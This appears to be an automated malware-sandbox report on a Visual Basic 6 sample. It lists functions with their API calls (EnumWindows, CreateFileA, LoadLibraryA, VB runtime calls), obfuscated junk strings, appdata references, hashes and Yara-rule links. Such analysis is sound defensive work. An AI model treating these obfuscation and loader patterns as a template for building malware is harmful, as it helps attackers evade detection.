Function 02281695, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,?), ref: 02281786

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 7510a22cc3ec9ff85fddabb1961d48d91de93cd5710648a79f3b286b06032b50
Instruction ID: b971e164c07987d6f10fd40b924e41439eef690a156b99bb5a682a8aa5636d5a
Opcode Fuzzy Hash: 7510a22cc3ec9ff85fddabb1961d48d91de93cd5710648a79f3b286b06032b50
Instruction Fuzzy Hash: A6215B7154C2C9CFDB29DF68C8446EB7BE6EF48200F18466DD84D97A86C7309E55C741

Uniqueness

Uniqueness Score: -1.00%

Function 0228D31D, Relevance: 1.5, APIs: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 0228D4B6

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1e401a65cb7c422c511e92e896074129276cb084ec1bd95d8f90b9f9d66ab4eb
Instruction ID: 768ffa01291c6b891637c57be636e91f3c80113ff707f7e099aa54502ced0e13
Opcode Fuzzy Hash: 1e401a65cb7c422c511e92e896074129276cb084ec1bd95d8f90b9f9d66ab4eb
Instruction Fuzzy Hash: 55118CB290C304DFCB586F29D92AAAEB7B1AF24310F82081ED8CA86244D3305981CF13

Uniqueness

Uniqueness Score: -1.00%

Function 02291E98, Relevance: 1.5, APIs: 1, Instructions: 37libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(6E6E1DCF), ref: 02291FF5

Memory Dump Source

Source File: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0f47c109acd28fbacbb40434f4e23901bd8925cf093c6760021c17744150300a
Instruction ID: 1e04721c5fb0bc19843a8b6d2571f8bb0386c7f0072abac9b3907efe7764b7c1
Opcode Fuzzy Hash: 0f47c109acd28fbacbb40434f4e23901bd8925cf093c6760021c17744150300a
Instruction Fuzzy Hash: 6A011670A80B9DEBDF749FA5C9A8BCA37A2EB98310F10815AED184A205D7304B44DB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00420F4D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420F6B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420F95
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FA0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FAB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420FB6
#525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420FC6
__vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420FD0
#629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00421011
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00421035
__vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00421044
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00421057
__vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00421076
__vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00421080
#514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 0042108F
__vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00421099
#513.MSVBVM60(?,00000008,000000EA), ref: 004210C8
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 004210D1
__vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 004210DB
__vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 004210E3
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 004210F2
__vbaVarDup.MSVBVM60 ref: 00421117
#542.MSVBVM60(?,?), ref: 00421124
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00421148
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0042115E
#690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00421189
__vbaNew2.MSVBVM60(0040259C,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 004211A1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 00421203
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000110), ref: 0042125F
__vbaStrMove.MSVBVM60(00000000,?,004025AC,00000110), ref: 00421289
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000110), ref: 00421291
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042129E
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212EA
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212F2
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 004212FA
__vbaFreeStr.MSVBVM60(00421320,?,?,?,?,?,?,00401546), ref: 00421302

Strings

monacanthid, xrefs: 00421016
Sjkler7, xrefs: 00421175
12/12/12, xrefs: 004210FA
ADDEDLY, xrefs: 0042117F
Pollenate4, xrefs: 00421071
Apokreos, xrefs: 0042108A
RESELLS, xrefs: 00421184
DIVARICATE, xrefs: 00421296
Antagonistiske, xrefs: 0042117A

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
API String ID: 3384239285-254499488
Opcode ID: 9c19e45f961192f5f7bc2494ddfd9e4e83427c18c294af48723a9f3d1aeb726c
Instruction ID: d4a2817e9825debda5ef056418d1bad8ca9cad3fb0e65083fc5ad7ac659b483c
Opcode Fuzzy Hash: 9c19e45f961192f5f7bc2494ddfd9e4e83427c18c294af48723a9f3d1aeb726c
Instruction Fuzzy Hash: B7A1D671E00218AFDB10EF91D886BDEB7B8AF14304F5081AAF505B71A1EB785A49CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F8EE, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F90B
__vbaVarDup.MSVBVM60 ref: 0041F93A
#667.MSVBVM60(?), ref: 0041F943
__vbaStrMove.MSVBVM60(?), ref: 0041F94D
__vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F958
__vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F96F
__vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F977
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F9A8
#518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F9B5
__vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F9BE
__vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F9C8
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F9D7
__vbaNew2.MSVBVM60(0040259C,004223C0), ref: 0041F9F2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041FA54
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041FAAD
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041FACF
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041FAFF
#629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB15
__vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB36
__vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB43
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041FB5D
__vbaVarDup.MSVBVM60 ref: 0041FB8D
#522.MSVBVM60(?,?), ref: 0041FB9A
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041FBA3
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041FBAD
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041FBBC
__vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041FBC9
__vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041FBCF
__vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041FBD9
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC1D
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC25
__vbaFreeStr.MSVBVM60(0041FC33,?,?,?,?,00401546), ref: 0041FC2D

Strings

SUPERSERIOUS, xrefs: 0041FAE2
galopbanernes, xrefs: 0041FBC4
Langfredagene5, xrefs: 0041F98B
f, xrefs: 0041FBDE
appdata, xrefs: 0041F91D
Skovede1, xrefs: 0041FB70
Picry, xrefs: 0041F953

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
API String ID: 1362175604-1043247457
Opcode ID: 3ef2b7d5c46d8022f39fbf57bfa629afe8e82506dd976061f03c2d49f8e79b24
Instruction ID: 9f4e8340e245fce694b74ec5e0d5aca1eee28677b39bd58d7b4af9f48fe85b1a
Opcode Fuzzy Hash: 3ef2b7d5c46d8022f39fbf57bfa629afe8e82506dd976061f03c2d49f8e79b24
Instruction Fuzzy Hash: 0C81FA72D00218ABDB14EB91CC45FDEB7B9BF04304F1085AAE505B71A1EB785B89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FC50, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FC6D
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00401546), ref: 0041FC92
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,0000004C), ref: 0041FCF4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402EC8,00000028), ref: 0041FD46
__vbaFreeObj.MSVBVM60 ref: 0041FD5D
#697.MSVBVM60(00003139), ref: 0041FD67
__vbaStrMove.MSVBVM60(00003139), ref: 0041FD71
#618.MSVBVM60(?,00000064,00003139), ref: 0041FD7B
__vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041FD85
__vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FD90
__vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDA7
__vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDCF
#666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDDC
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FDFB
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE01
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE0B
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE1A
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE22
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041FE35
__vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041FE45
__vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041FE4C
#526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE57
__vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE60
__vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE6A
__vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FE72
#696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FE7C
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEB6
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEBE
__vbaFreeStr.MSVBVM60(0041FECC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FEC6

Strings

\qc17, xrefs: 0041FDE1
Sciuroid8, xrefs: 0041FD8B
appdata, xrefs: 0041FDBB
Rutiner, xrefs: 0041FE77

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
String ID: Rutiner$Sciuroid8$\qc17$appdata
API String ID: 862176544-1118470403
Opcode ID: a3810d19d4ca8b7809da29301cd96011e8d686186eb5e73da6d7b49df30c274e
Instruction ID: 6286e1cac6bc4842638b7be6c62ba3b45a710a2077f63fb351c5ba841ef899ad
Opcode Fuzzy Hash: a3810d19d4ca8b7809da29301cd96011e8d686186eb5e73da6d7b49df30c274e
Instruction Fuzzy Hash: C3510D71900218AFDB10EBA1CD46FDEB7B8AF14708F10817AF105B71E1DB785A85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE1A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EE36
#526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041EE63
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE76
#712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE86
__vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE90
__vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EE98
__vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EEA0
#685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EEA5
__vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041EEAF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040264C,0000001C), ref: 0041EEDE
#613.MSVBVM60(?,00000003), ref: 0041EF01
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EF0A
__vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EF14
__vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EF1C
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EF2B
#574.MSVBVM60(00000003), ref: 0041EF45
__vbaStrMove.MSVBVM60(00000003), ref: 0041EF4F
__vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF5A
__vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF6D
__vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF75
#611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF86
__vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EF90
__vbaNew2.MSVBVM60(0040259C,004223C0,INVALIDNESS,00000000,00000003), ref: 0041EFA8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041EFF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000068), ref: 0041F036
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000068), ref: 0041F055
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F087
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F08F
__vbaFreeStr.MSVBVM60(0041F09D,INVALIDNESS,00000000,00000003), ref: 0041F097

Strings

INVALIDNESS, xrefs: 0041EF55
Flimflam, xrefs: 0041EE81
Fribords2, xrefs: 0041EE7C

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
String ID: Flimflam$Fribords2$INVALIDNESS
API String ID: 2258197736-3412120936
Opcode ID: f3033331b7b5841a882ad28fe36af074375b8c63f1e990462f40b42538c18e7c
Instruction ID: 42a8e989c12e80aecfa1cc5b8e89ae9cb5c3b47e7947c4ac95b0f4058153ffdd
Opcode Fuzzy Hash: f3033331b7b5841a882ad28fe36af074375b8c63f1e990462f40b42538c18e7c
Instruction Fuzzy Hash: 7471E671D00218ABDB00EBA5D885BDDBBB8BF08704F50813AF505BB1E2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2C4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F2E1
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F2F9
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F304
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F311
#524.MSVBVM60(?,00004008), ref: 0041F32B
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F346
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F352
__vbaNew2.MSVBVM60(0040259C,004223C0,00008008,?,?,?,?,00004008), ref: 0041F376
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F3C3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F40A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F434
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F43C
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F454
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041F4A1
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F4E1
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F4FB
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F505
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F534
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F54B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F553
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F55B
#536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F572
__vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F57C
__vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F584
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5BD
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5C5
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5CD
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5D5
__vbaFreeStr.MSVBVM60(0041F5E3,00000003,00008008,?,?,?,?,00004008), ref: 0041F5DD

Strings

Gurgledes, xrefs: 0041F309
ICHTHYOPOLISM, xrefs: 0041F330

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
String ID: Gurgledes$ICHTHYOPOLISM
API String ID: 2536202667-1995639141
Opcode ID: ed9cbcf699c8d69c2cf80d41fbead2f660abd6394d2512a5dd200d9f78887e4e
Instruction ID: b3c566b355482b57377b37e971ed18877d79850291c35d20e2b1ade5fc0181c7
Opcode Fuzzy Hash: ed9cbcf699c8d69c2cf80d41fbead2f660abd6394d2512a5dd200d9f78887e4e
Instruction Fuzzy Hash: FE91F771D00218EFDB10EFA5C985BDDBBB5BF09304F60816AE005B71A2DB785A49CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F5FE, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F61C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F634
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F63F
__vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F64F
#564.MSVBVM60(00000004,?), ref: 0041F67C
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F696
__vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F6B5
__vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F6CB
#546.MSVBVM60(?,?,?,00401546), ref: 0041F6E6
__vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F6F1
__vbaVarDup.MSVBVM60 ref: 0041F718
#629.MSVBVM60(?,?,00000005,00000002), ref: 0041F72B
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F73E
#712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F74E
__vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F758
#527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F75E
__vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F768
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F777
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F78D
__vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F79D
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7E8
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7F0
__vbaFreeVar.MSVBVM60(0041F806,?,?,00401546), ref: 0041F7F8
__vbaFreeStr.MSVBVM60(0041F806,?,?,00401546), ref: 0041F800

Strings

SNVRET, xrefs: 0041F744
LAAGETS, xrefs: 0041F704
Dukkestuer, xrefs: 0041F64A
Antievangelical9, xrefs: 0041F795
OVERBEBYRDES, xrefs: 0041F749

Memory Dump Source

Source File: 00000015.00000002.1168602709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1168572061.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.1168776926.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.1168816225.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
API String ID: 3927249403-1920341584
Opcode ID: 4aa486b8403f2ab1d3a52087a52ee22202fdb5959a08ae937403575e1ae1e72b
Instruction ID: 91e37aafcf061903c238f2ee37cd7516ea807def931bc120dfbf4a8747ae6ff2
Opcode Fuzzy Hash: 4aa486b8403f2ab1d3a52087a52ee22202fdb5959a08ae937403575e1ae1e72b
Instruction Fuzzy Hash: 2D51EA72D00209ABDB10EBE1C846FDEB778AF04704F50817AB515B71E1EB785A4A8B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC89, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041ECA5
__vbaInStrB.MSVBVM60(00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ECE0
__vbaVarDup.MSVBVM60 ref: 0041ED12
#629.MSVBVM60(?,00000000,00000048,00000002), ref: 0041ED25
__vbaStrVarMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041ED2E
__vbaStrMove.MSVBVM60(?,?,00000000,00000048,00000002), ref: 0041ED38
__vbaFreeVarList.MSVBVM60(00000003,00000000,00000002,?,?,?,00000000,00000048,00000002), ref: 0041ED4B
#539.MSVBVM60(?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED60
__vbaStrVarMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED69
__vbaStrMove.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED73
__vbaFreeVar.MSVBVM60(?,?,00000014,0000009E,0000004F,?,?,?,00401546), ref: 0041ED7B
#696.MSVBVM60(GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED85
#698.MSVBVM60(00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED92
__vbaStrVarMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041ED9B
__vbaStrMove.MSVBVM60(00000000,00000000,00000000,GILENO,00000000,Fritgaaende,SKADESLSHOLDELSERNE,000000B5,?,?,?,?,00401546), ref: 0041EDA5
